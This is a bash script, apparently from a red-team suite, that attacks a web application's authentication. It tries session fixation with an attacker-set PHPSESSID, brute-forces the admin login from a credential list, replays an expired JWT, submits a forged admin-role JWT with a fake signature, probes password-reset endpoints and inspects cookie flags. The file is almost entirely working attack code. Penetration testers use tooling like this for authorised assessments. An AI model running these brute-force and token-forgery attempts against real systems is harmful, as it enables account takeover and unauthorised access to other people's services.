| 1 | #!/bin/bash |
| 2 | # Red-team: Auth/session security โ session fixation, token replay, brute force, MFA bypass |
| 3 | SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" |
| 4 | source "$SCRIPT_DIR/../config.sh" |
| 5 | OUT="$OUT/auth_session" |
| 6 | mkdir -p "$OUT" |
| 7 | |
| 8 | echo '=== AUTH & SESSION RED-TEAM ===' | tee "$OUT/summary.txt" |
| 9 | |
| 10 | # Session fixation attempt โ set our own session ID |
| 11 | echo '--- Session Fixation ---' | tee -a "$OUT/summary.txt" |
| 12 | resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 -H 'Cookie: PHPSESSID=ATTACKER_CONTROLLED_SESSION_12345' "$TARGET/admin/") |
| 13 | echo "[$resp] Preset PHPSESSID to attacker value" | tee -a "$OUT/summary.txt" |
| 14 | |
| 15 | # Capture session cookie after login attempt and check if same ID is kept |
| 16 | echo '' | tee -a "$OUT/summary.txt" |
| 17 | echo '--- Admin Brute Force (top credentials) ---' | tee -a "$OUT/summary.txt" |
| 18 | CREDS=("${BRUTE_CREDS[@]}") |
| 19 | for cred in "${CREDS[@]}"; do |
| 20 | user="${cred%%:*}" |
| 21 | pass="${cred##*:}" |
| 22 | resp=$(curl -sk -c /tmp/jar.txt -o /tmp/login_body.txt -w '%{http_code}' --max-time 10 -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d "username=$user&password=$pass&submit=Login" "$TARGET/admin/") |
| 23 | # A 302 redirect away from /admin/ after POST = successful login |
| 24 | body_hint=$(grep -i 'invalid\|wrong\|error\|failed\|logout\|dashboard' /tmp/login_body.txt 2>/dev/null | head -1 | cut -c1-60) |
| 25 | echo "[$resp] $user:$pass | $body_hint" | tee -a "$OUT/summary.txt" |
| 26 | done |
| 27 | |
| 28 | # Token replay โ capture a 401 response token if any is revealed |
| 29 | echo '' | tee -a "$OUT/summary.txt" |
| 30 | echo '--- JWT Token Replay & Manipulation ---' | tee -a "$OUT/summary.txt" |
| 31 | # Expired-looking token (exp in past) |
| 32 | EXPIRED_JWT='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ0ZXN0IiwiZXhwIjoxNjAwMDAwMDAwfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c' |
| 33 | resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 -H "Authorization: Bearer $EXPIRED_JWT" -H 'Content-Type: application/json' -d '{"data":"test"}' "$API_TARGET/encrypt") |
| 34 | echo "[$resp] Expired JWT" | tee -a "$OUT/summary.txt" |
| 35 | |
| 36 | # Same-signature different payload (alg:HS256 with weak secret guess) |
| 37 | WEAK_JWT='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImV4cCI6OTk5OTk5OTk5OX0.YmFkc2lnbmF0dXJl' |
| 38 | resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 -H "Authorization: Bearer $WEAK_JWT" -H 'Content-Type: application/json' -d '{"data":"test"}' "$API_TARGET/encrypt") |
| 39 | echo "[$resp] Crafted admin JWT (fake sig)" | tee -a "$OUT/summary.txt" |
| 40 | |
| 41 | # Password reset flow (check if endpoint exposed) |
| 42 | echo '' | tee -a "$OUT/summary.txt" |
| 43 | echo '--- Password Reset Flow ---' | tee -a "$OUT/summary.txt" |
| 44 | for path in '/reset-password' '/forgot-password' '/password-reset' '/api/reset' '/admin/reset'; do |
| 45 | resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 8 "$TARGET$path") |
| 46 | echo "[$resp] $path" | tee -a "$OUT/summary.txt" |
| 47 | done |
| 48 | |
| 49 | # Cookie security flags check |
| 50 | echo '' | tee -a "$OUT/summary.txt" |
| 51 | echo '--- Cookie Security Flags ---' | tee -a "$OUT/summary.txt" |
| 52 | curl -sk -I --max-time 10 -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=admin&password=test' "$TARGET/admin/" | grep -i 'set-cookie' | tee -a "$OUT/summary.txt" |
| 53 | |
| 54 | cat "$OUT/summary.txt" |
| 55 |
Script Viewer
Red Team Suite › 15_auth_session.sh